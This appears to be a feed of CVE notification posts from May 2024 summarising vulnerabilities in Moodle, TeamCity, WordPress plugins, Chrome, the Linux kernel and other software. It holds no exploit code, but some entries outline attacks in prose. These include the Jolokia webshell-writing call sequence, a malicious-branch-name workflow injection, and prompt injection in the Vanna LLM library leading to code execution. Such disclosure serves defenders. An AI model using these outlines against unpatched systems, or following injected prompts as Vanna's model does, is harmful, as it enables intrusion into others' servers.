| 2024-05-31 21:37:27 |
🚨 CVE-2024-34006The site log report required additional encoding of event descriptions to ensure any HTML in the content is displayed in plaintext instead of being rendered.🎖@cveNotify |
|
| 2024-05-31 21:37:26 |
🚨 CVE-2024-34005In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore database activity modules and direct access to the web server outside of the Moodle webroot could execute a local file include.🎖@cveNotify |
|
| 2024-05-31 21:37:25 |
🚨 CVE-2024-34003In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore workshop modules and direct access to the web server outside of the Moodle webroot could execute a local file include.🎖@cveNotify |
|
| 2024-05-31 21:37:24 |
🚨 CVE-2024-34002In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore feedback modules and direct access to the web server outside of the Moodle webroot could execute a local file include.🎖@cveNotify |
|
| 2024-05-31 20:37:31 |
🚨 CVE-2024-36845An invalid pointer in the modbus_receive() function of libmodbus v3.1.6 allows attackers to cause a Denial of Service (DoS) via a crafted message sent to the unit-test-server.🎖@cveNotify |
|
| 2024-05-31 20:37:30 |
🚨 CVE-2024-36843libmodbus v3.1.6 was discovered to contain a heap overflow via the modbus_mapping_free() function.🎖@cveNotify |
|
| 2024-05-31 20:37:29 |
🚨 CVE-2024-34001Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk.🎖@cveNotify |
|
| 2024-05-31 20:37:26 |
🚨 CVE-2024-34000ID numbers displayed in the lesson overview report required additional sanitizing to prevent a stored XSS risk.🎖@cveNotify |
|
| 2024-05-31 20:37:25 |
🚨 CVE-2024-33997Additional sanitizing was required when opening the equation editor to prevent a stored XSS risk when editing another user's equation.🎖@cveNotify |
|
| 2024-05-31 20:37:24 |
🚨 CVE-2024-33996Incorrect validation of allowed event types in a calendar web service made it possible for some users to create events with types/audiences they did not have permission to publish to.🎖@cveNotify |
|
| 2024-05-31 19:37:45 |
🚨 CVE-2024-22060An unrestricted file upload vulnerability in web component of Ivanti Neurons for ITSM allows a remote, authenticated, high privileged user to write arbitrary files into sensitive directories of ITSM server.🎖@cveNotify |
|
| 2024-05-31 19:37:44 |
🚨 CVE-2024-22058A buffer overflow allows a low privilege user on the local machine that has the EPM Agent installed to execute arbitrary code with elevated permissions in Ivanti EPM 2021.1 and older.🎖@cveNotify |
|
| 2024-05-31 19:37:43 |
🚨 CVE-2023-46810A local privilege escalation vulnerability in Ivanti Secure Access Client for Linux before 22.7R1, allows a low privileged user to execute code as root.🎖@cveNotify |
|
| 2024-05-31 19:37:39 |
🚨 CVE-2023-38551A CRLF Injection vulnerability in Ivanti Connect Secure (9.x, 22.x) allows an authenticated high-privileged user to inject malicious code on a victim’s browser, thereby leading to cross-site scripting attack.🎖@cveNotify |
|
| 2024-05-31 19:37:38 |
🚨 CVE-2021-44534Insufficient user input filtering leads to arbitrary file read by non-authenticated attacker, which results in sensitive information disclosure.🎖@cveNotify |
|
| 2024-05-31 19:37:37 |
🚨 CVE-2024-35142IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges. IBM X-Force ID: 292418.🎖@cveNotify |
|
| 2024-05-31 19:37:33 |
🚨 CVE-2024-35140IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to improper certificate validation. IBM X-Force ID: 292416.🎖@cveNotify |
|
| 2024-05-31 19:37:32 |
🚨 CVE-2024-28736An issue in Debezium Community debezium-ui v.2.5 allows a local attacker to execute arbitrary code via the refresh page function.🎖@cveNotify |
|
| 2024-05-31 19:37:31 |
🚨 CVE-2022-25037An issue in wanEditor v4.7.11 and fixed in v.4.7.12 and v.5 was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function.🎖@cveNotify |
|
| 2024-05-31 19:37:30 |
🚨 CVE-2024-5565The Vanna library uses a prompt function to present the user with visualized results, it is possible to alter the prompt using prompt injection and run arbitrary Python code instead of the intended visualization code. Specifically - allowing external input to the library’s “ask” method with "visualize" set to True (default behavior) leads to remote code execution.🎖@cveNotify |
|
| 2024-05-31 19:37:27 |
🚨 CVE-2024-36108casgate is an Open Source Identity and Access Management system. In affected versions `casgate` allows remote unauthenticated attacker to obtain sensitive information via GET request to an API endpoint. This issue has been addressed in PR #201 which is pending merge. An attacker could use `id` parameter of GET requests with value `anonymous/ anonymous` to bypass authorization on certain API endpoints. Successful exploitation of the vulnerability could lead to account takeover, privilege escalation or provide attacker with credential to other services. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-31 19:37:26 |
🚨 CVE-2023-7073The Auto Featured Image (Auto Post Thumbnail) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.0 via the upload_to_library AJAX action. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-05-31 19:37:25 |
🚨 CVE-2024-31907IBM Planning Analytics Local 2.0 and 2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 289889.🎖@cveNotify |
|
| 2024-05-31 19:37:24 |
🚨 CVE-2024-31889IBM Planning Analytics Local 2.0 and 2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 288136.🎖@cveNotify |
|
| 2024-05-31 17:37:25 |
🚨 CVE-2024-35142IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to execution of unnecessary privileges. IBM X-Force ID: 292418.🎖@cveNotify |
|
| 2024-05-31 17:37:24 |
🚨 CVE-2024-35140IBM Security Verify Access Docker 10.0.0 through 10.0.6 could allow a local user to escalate their privileges due to improper certificate validation. IBM X-Force ID: 292416.🎖@cveNotify |
|
| 2024-05-31 16:37:25 |
🚨 CVE-2022-25038wanEditor v4.7.11 was discovered to contain a cross-site scripting (XSS) vulnerability via the video upload function.🎖@cveNotify |
|
| 2024-05-31 16:37:24 |
🚨 CVE-2022-25037An issue in wanEditor v4.7.11 and fixed in v.4.7.12 and v.5 was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function.🎖@cveNotify |
|
| 2024-05-31 16:07:25 |
🚨 CVE-2024-24919Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.🎖@cveNotify |
|
| 2024-05-31 16:07:24 |
🚨 CVE-2024-4978Justice AV Solutions Viewer Setup 8.3.7.250-1 contains a malicious binary when executed and is signed with an unexpected authenticode signature. A remote, privileged threat actor may exploit this vulnerability to execute of unauthorized PowerShell commands.🎖@cveNotify |
|
| 2024-05-31 14:37:36 |
🚨 CVE-2024-36372In JetBrains TeamCity before 2023.05.6 reflected XSS on the subscriptions page was possible🎖@cveNotify |
|
| 2024-05-31 14:37:32 |
🚨 CVE-2024-36370In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5 stored XSS via OAuth connection settings was possible🎖@cveNotify |
|
| 2024-05-31 14:37:31 |
🚨 CVE-2024-36368In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5 reflected XSS via OAuth provider configuration was possible🎖@cveNotify |
|
| 2024-05-31 14:37:30 |
🚨 CVE-2024-36367In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5 stored XSS via third-party reports was possible🎖@cveNotify |
|
| 2024-05-31 14:37:26 |
🚨 CVE-2024-36365In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5, 2024.03.2 a third-party agent could impersonate a cloud agent🎖@cveNotify |
|
| 2024-05-31 14:37:25 |
🚨 CVE-2024-36363In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5 several Stored XSS in code inspection reports were possible🎖@cveNotify |
|
| 2024-05-31 14:37:24 |
🚨 CVE-2024-36362In JetBrains TeamCity before 2022.04.7, 2022.10.6, 2023.05.6, 2023.11.5, 2024.03.2 path traversal allowing to read files from server was possible🎖@cveNotify |
|
| 2024-05-31 13:37:25 |
🚨 CVE-2024-31889IBM Planning Analytics Local 2.0 and 2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 288136.🎖@cveNotify |
|
| 2024-05-31 13:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-05-31 13:07:44 |
🚨 CVE-2024-5345The Responsive Owl Carousel for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.2.0 via the layout parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. The inclusion is limited to PHP files.🎖@cveNotify |
|
| 2024-05-31 13:07:43 |
🚨 CVE-2024-37018The OpenDaylight 0.15.3 controller allows topology poisoning via API requests because an application can manipulate the path that is taken by discovery packets.🎖@cveNotify |
|
| 2024-05-31 13:07:42 |
🚨 CVE-2024-37017asdcplib (aka AS-DCP Lib) 2.13.1 has a heap-based buffer over-read in ASDCP::TimedText::MXFReader::h__Reader::MD_to_TimedText_TDesc in AS_DCP_TimedText.cpp in libasdcp.so.🎖@cveNotify |
|
| 2024-05-31 13:07:38 |
🚨 CVE-2024-5498Use after free in Presentation API in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-31 13:07:37 |
🚨 CVE-2024-5496Use after free in Media Session in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-31 13:07:36 |
🚨 CVE-2024-5495Use after free in Dawn in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-31 13:07:32 |
🚨 CVE-2024-5493Heap buffer overflow in WebRTC in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-31 13:07:31 |
🚨 CVE-2024-1298EDK2 contains a vulnerability when S3 sleep is activated where an Attacker may cause a Division-By-Zero due to a UNIT32 overflow via local access. A successful exploit of this vulnerability may lead to a loss of Availability.🎖@cveNotify |
|
| 2024-05-31 13:07:30 |
🚨 CVE-2024-5271Fuji Electric Monitouch V-SFT is vulnerable to an out-of-bounds write because of a type confusion, which could result in arbitrary code execution.🎖@cveNotify |
|
| 2024-05-31 13:07:26 |
🚨 CVE-2024-34171Fuji Electric Monitouch V-SFT is vulnerable to a stack-based buffer overflow, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-05-31 13:07:25 |
🚨 CVE-2024-35228Wagtail is an open source content management system built on Django. Due to an improperly applied permission check in the `wagtail.contrib.settings` module, a user with access to the Wagtail admin and knowledge of the URL of the edit view for a settings model can access and update that setting, even when they have not been granted permission over the model. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 6.0.5 and 6.1.2. Wagtail releases prior to 6.0 are unaffected. Users are advised to upgrade. Site owners who are unable to upgrade to a patched version can avoid the vulnerability in `ModelViewSet` by registering the model as a snippet instead. No workaround is available for `wagtail.contrib.settings`.🎖@cveNotify |
|
| 2024-05-31 13:07:24 |
🚨 CVE-2024-21506Versions of the package pymongo before 4.6.3 are vulnerable to Out-of-bounds Read in the bson module. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.🎖@cveNotify |
|
| 2024-05-31 10:37:26 |
🚨 CVE-2024-5347The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'arrow' attribute within the plugin's Post Navigation widget in all versions up to, and including, 3.10.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 10:37:25 |
🚨 CVE-2024-4160The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm-all-packages' shortcode in all versions up to, and including, 3.2.90 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 10:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-05-31 09:37:25 |
🚨 CVE-2024-5436Type confusion in Snapchat LensCore could lead to denial of service or arbitrary code execution prior to version 12.88. We recommend upgrading to version 12.88 or above.🎖@cveNotify |
|
| 2024-05-31 09:37:24 |
🚨 CVE-2022-41678Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allowsorg.jolokia.http.AgentServlet to handler request to /api/jolokiaorg.jolokia.http.HttpRequestHandler#handlePostRequest is able tocreate JmxRequest through JSONObject. And calls toorg.jolokia.http.HttpRequestHandler#executeRequest.Into deeper calling stacks,org.jolokia.handler.ExecHandler#doHandleRequest can be invokedthrough refection. This could lead to RCE through viavarious mbeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl which exists on Java version above 11.1 Call newRecording.2 Call setConfiguration. And a webshell data hides in it.3 Call startRecording.4 Call copyTo method. The webshell will be written to a .jsp file.The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia.A more restrictive Jolokia configuration has been defined in default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distributions version including updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.🎖@cveNotify |
|
| 2024-05-31 08:37:25 |
🚨 CVE-2024-5524Information exposure vulnerability in Astrotalks affecting version 10/03/2023. This vulnerability allows unregistered users to access all internal links of the application without providing any credentials.🎖@cveNotify |
|
| 2024-05-31 08:37:24 |
🚨 CVE-2024-5523SQL injection vulnerability in Astrotalks affecting version 10/03/2023. This vulnerability could allow an authenticated local user to send a specially crafted SQL query to the 'searchString' parameter and retrieve all information stored in the database.🎖@cveNotify |
|
| 2024-05-31 07:37:25 |
🚨 CVE-2024-5427The WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Reservation Form shortcode in all versions up to, and including, 2.2.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 07:37:24 |
🚨 CVE-2024-21506Versions of the package pymongo before 4.6.3 are vulnerable to Out-of-bounds Read in the bson module. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.🎖@cveNotify |
|
| 2024-05-31 06:37:30 |
🚨 CVE-2024-4469The WP STAGING WordPress Backup Plugin WordPress plugin before 3.5.0 does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.🎖@cveNotify |
|
| 2024-05-31 06:37:26 |
🚨 CVE-2024-4379The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Global Tooltip widget in all versions up to, and including, 4.10.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 06:37:25 |
🚨 CVE-2024-36246Missing authorization vulnerability exists in Unifier and Unifier Cast Version.5.0 or later, and the patch "20240527" not applied. If this vulnerability is exploited, arbitrary code may be executed with LocalSystem privilege. As a result, a malicious program may be installed, data may be modified or deleted.🎖@cveNotify |
|
| 2024-05-31 06:37:24 |
🚨 CVE-2024-23847Incorrect default permissions issue exists in Unifier and Unifier Cast Version.5.0 or later, and the patch "20240527" not applied. If this vulnerability is exploited, arbitrary code may be executed with LocalSystem privilege. As a result, a malicious program may be installed, data may be modified or deleted.🎖@cveNotify |
|
| 2024-05-31 05:37:24 |
🚨 CVE-2024-2793The Visual Website Collaboration, Feedback & Project Management – Atarim plugin for WordPress is vulnerable to Stored Cross-Site Scripting via comments in all versions up to, and including, 3.30 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 04:37:28 |
🚨 CVE-2024-37032Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.🎖@cveNotify |
|
| 2024-05-31 03:37:30 |
🚨 CVE-2024-5345The Responsive Owl Carousel for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.2.0 via the layout parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. The inclusion is limited to PHP files.🎖@cveNotify |
|
| 2024-05-31 02:37:24 |
🚨 CVE-2024-32850Improper neutralization of special elements used in a command ('Command Injection') exists in SkyBridge MB-A100/MB-A110 firmware Ver. 4.2.2 and earlier and SkyBridge BASIC MB-A130 firmware Ver. 1.5.5 and earlier. If the remote monitoring and control function is enabled on the product, an attacker with access to the product may execute an arbitrary command or login to the product with the administrator privilege.🎖@cveNotify |
|
| 2024-05-31 01:37:25 |
🚨 CVE-2024-2700A vulnerability was found in the quarkus-core component. Quarkus captures local environment variables from the Quarkus namespace during the application's build, therefore, running the resulting application inherits the values captured at build time. Some local environment variables may have been set by the developer or CI environment for testing purposes, such as dropping the database during application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application, which can lead to dangerous behavior if the application does not override these values. This behavior only happens for configuration properties from the `quarkus.*` namespace. Application-specific properties are not captured.🎖@cveNotify |
|
| 2024-05-31 01:37:24 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-05-31 01:07:32 |
🚨 CVE-2024-24919Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.🎖@cveNotify |
|
| 2024-05-31 01:07:31 |
🚨 CVE-2024-1086A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.🎖@cveNotify |
|
| 2024-05-31 00:37:46 |
🚨 CVE-2024-37017asdcplib (aka AS-DCP Lib) 2.13.1 has a heap-based buffer over-read in ASDCP::TimedText::MXFReader::h__Reader::MD_to_TimedText_TDesc in AS_DCP_TimedText.cpp in libasdcp.so.🎖@cveNotify |
|
| 2024-05-30 23:37:29 |
🚨 CVE-2024-5498Use after free in Presentation API in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-30 23:37:26 |
🚨 CVE-2024-5497Out of bounds memory access in Keyboard Inputs in Google Chrome prior to 125.0.6422.141 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-30 23:37:25 |
🚨 CVE-2024-5495Use after free in Dawn in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-30 23:37:24 |
🚨 CVE-2024-5493Heap buffer overflow in WebRTC in Google Chrome prior to 125.0.6422.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-30 21:37:25 |
🚨 CVE-2024-36119Statamic is a, Laravel + Git powered CMS designed for building websites. In affected versions users registering via the `user:register_form` tag will have their password confirmation stored in plain text in their user file. This only affects sites matching **all** of the following conditions: 1. Running Statamic versions between 5.3.0 and 5.6.1. (This version range represents only one calendar week), 2. Using the `user:register_form` tag. 3. Using file-based user accounts. (Does not affect users stored in a database.), 4. Has users that have registered during that time period. (Existing users are not affected.). Additionally passwords are only visible to users that have access to read user yaml files, typically developers of the application itself. This issue has been patched in version 5.6.2, however any users registered during that time period and using the affected version range will still have the the `password_confirmation` value in their yaml files. We recommend that affected users have their password reset. System administrators are advised to upgrade their deployments. There are no known workarounds for this vulnerability. Anyone who commits their files to a public git repo, may consider clearing the sensitive data from the git history as it is likely that passwords were uploaded.🎖@cveNotify |
|
| 2024-05-30 21:37:24 |
🚨 CVE-2024-1298EDK2 contains a vulnerability when S3 sleep is activated where an Attacker may cause a Division-By-Zero due to a UNIT32 overflow via local access. A successful exploit of this vulnerability may lead to a loss of Availability.🎖@cveNotify |
|
| 2024-05-30 19:37:24 |
🚨 CVE-2024-35228Wagtail is an open source content management system built on Django. Due to an improperly applied permission check in the `wagtail.contrib.settings` module, a user with access to the Wagtail admin and knowledge of the URL of the edit view for a settings model can access and update that setting, even when they have not been granted permission over the model. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 6.0.5 and 6.1.2. Wagtail releases prior to 6.0 are unaffected. Users are advised to upgrade. Site owners who are unable to upgrade to a patched version can avoid the vulnerability in `ModelViewSet` by registering the model as a snippet instead. No workaround is available for `wagtail.contrib.settings`.🎖@cveNotify |
|
| 2024-05-30 15:37:37 |
🚨 CVE-2024-5517A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file changepwd.php. The manipulation of the argument useremail leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266588.🎖@cveNotify |
|
| 2024-05-30 15:37:36 |
🚨 CVE-2024-3924A code injection vulnerability exists in the huggingface/text-generation-inference repository, specifically within the `autodocs.yml` workflow file. The vulnerability arises from the insecure handling of the `github.head_ref` user input, which is used to dynamically construct a command for installing a software package. An attacker can exploit this by forking the repository, creating a branch with a malicious payload as the name, and then opening a pull request to the base repository. Successful exploitation could lead to arbitrary code execution within the context of the GitHub Actions runner. This issue affects versions up to and including v2.0.0 and was fixed in version 2.0.0.🎖@cveNotify |
|
| 2024-05-30 15:37:32 |
🚨 CVE-2024-36025In the Linux kernel, the following vulnerability has been resolved:scsi: qla2xxx: Fix off by one in qla_edif_app_getstats()The app_reply->elem[] array is allocated earlier in this function and ithas app_req.num_ports elements. Thus this > comparison needs to be >= toprevent memory corruption.🎖@cveNotify |
|
| 2024-05-30 15:37:31 |
🚨 CVE-2024-36023In the Linux kernel, the following vulnerability has been resolved:Julia Lawall reported this null pointer dereference, this should fix it.🎖@cveNotify |
|
| 2024-05-30 15:37:30 |
🚨 CVE-2024-36022In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: Init zone device and drm client after mode-1 reset on reloadIn passthrough environment, when amdgpu is reloaded after unload, mode-1is triggered after initializing the necessary IPs, That init does notinclude KFD, and KFD init waits until the reset is completed. KFD initis called in the reset handler, but in this case, the zone device anddrm client is not initialized, causing app to create kernel panic.v2: Removing the init KFD condition from amdgpu_amdkfd_drm_client_create.As the previous version has the potential of creating DRM client twice.v3: v2 patch results in SDMA engine hung as DRM open causes VM clear to SDMAbefore SDMA init. Adding the condition to in drm client creation, on top of v1,to guard against drm client creation call multiple times.🎖@cveNotify |
|
| 2024-05-30 15:37:27 |
🚨 CVE-2024-36021In the Linux kernel, the following vulnerability has been resolved:net: hns3: fix kernel crash when devlink reload during pf initializationThe devlink reload process will access the hardware resources,but the register operation is done before the hardware is initialized.So, processing the devlink reload during initialization may lead to kernelcrash. This patch fixes this by taking devl_lock during initialization.🎖@cveNotify |
|
| 2024-05-30 15:37:26 |
🚨 CVE-2024-36019In the Linux kernel, the following vulnerability has been resolved:regmap: maple: Fix cache corruption in regcache_maple_drop()When keeping the upper end of a cache block entry, the entry[] arraymust be indexed by the offset from the base register of the block,i.e. max - mas.index.The code was indexing entry[] by only the register address, leadingto an out-of-bounds access that copied some part of the kernelmemory over the cache contents.This bug was not detected by the regmap KUnit test because it onlytests with a block of registers starting at 0, so mas.index == 0.🎖@cveNotify |
|
| 2024-05-30 15:37:25 |
🚨 CVE-2024-36018In the Linux kernel, the following vulnerability has been resolved:nouveau/uvmm: fix addr/range calcs for remap operationsdEQP-VK.sparse_resources.image_rebind.2d_array.r64i.128_128_8was causing a remap operation like the below.op_remap: prev: 0000003fffed0000 00000000000f0000 00000000a5abd18a 0000000000000000op_remap: next:op_remap: unmap: 0000003fffed0000 0000000000100000 0op_map: map: 0000003ffffc0000 0000000000010000 000000005b1ba33c 00000000000e0000This was resulting in an unmap operation from 0x3fffed0000+0xf0000, 0x100000which was corrupting the pagetables and oopsing the kernel.Fixes the prev + unmap range calcs to use start/end and map back to addr/range.🎖@cveNotify |
|
| 2024-05-30 15:37:24 |
🚨 CVE-2024-35504A cross-site scripting (XSS) vulnerability in the login page of FineSoft v8.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL:errorname parameter after a failed login attempt.🎖@cveNotify |
|
| 2024-05-30 14:37:40 |
🚨 CVE-2023-47038A vulnerability was found in perl 5.30.0 through 5.38.0. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.🎖@cveNotify |
|
| 2024-05-30 14:07:25 |
🚨 CVE-2024-3584qdrant/qdrant version 1.9.0-dev is vulnerable to path traversal due to improper input validation in the `/collections/{name}/snapshots/upload` endpoint. By manipulating the `name` parameter through URL encoding, an attacker can upload a file to an arbitrary location on the system, such as `/root/poc.txt`. This vulnerability allows for the writing and overwriting of arbitrary files on the server, potentially leading to a full takeover of the system. The issue is fixed in version 1.9.0.🎖@cveNotify |
|
| 2024-05-30 14:07:24 |
🚨 CVE-2024-36017In the Linux kernel, the following vulnerability has been resolved:rtnetlink: Correct nested IFLA_VF_VLAN_LIST attribute validationEach attribute inside a nested IFLA_VF_VLAN_LIST is assumed to be astruct ifla_vf_vlan_info so the size of such attribute needs to be at leastof sizeof(struct ifla_vf_vlan_info) which is 14 bytes.The current size validation in do_setvfinfo is against NLA_HDRLEN (4 bytes)which is less than sizeof(struct ifla_vf_vlan_info) so this validationis not enough and a too small attribute might be cast to astruct ifla_vf_vlan_info, this might result in an out of bandsread access when accessing the saved (casted) entry in ivvl.🎖@cveNotify |
|
| 2024-05-30 13:37:44 |
🚨 CVE-2024-36267Path traversal vulnerability exists in Redmine DMSF Plugin versions prior to 3.1.4. If this vulnerability is exploited, a logged-in user may obtain or delete arbitrary files on the server (within the privilege of the Redmine process).🎖@cveNotify |
|
| 2024-05-30 13:37:43 |
🚨 CVE-2024-4218The AffiEasy plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.7. This is due to plugin improperly releasing the tagged and patched version of the plugin - the vulnerable version is used as the core files, while the patched version was included in a 'trunk' folder. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 13:37:42 |
🚨 CVE-2024-3947The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_settings() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 13:37:38 |
🚨 CVE-2024-3945The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_manage() function. This makes it possible for unauthenticated attackers to add new todo items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 13:37:37 |
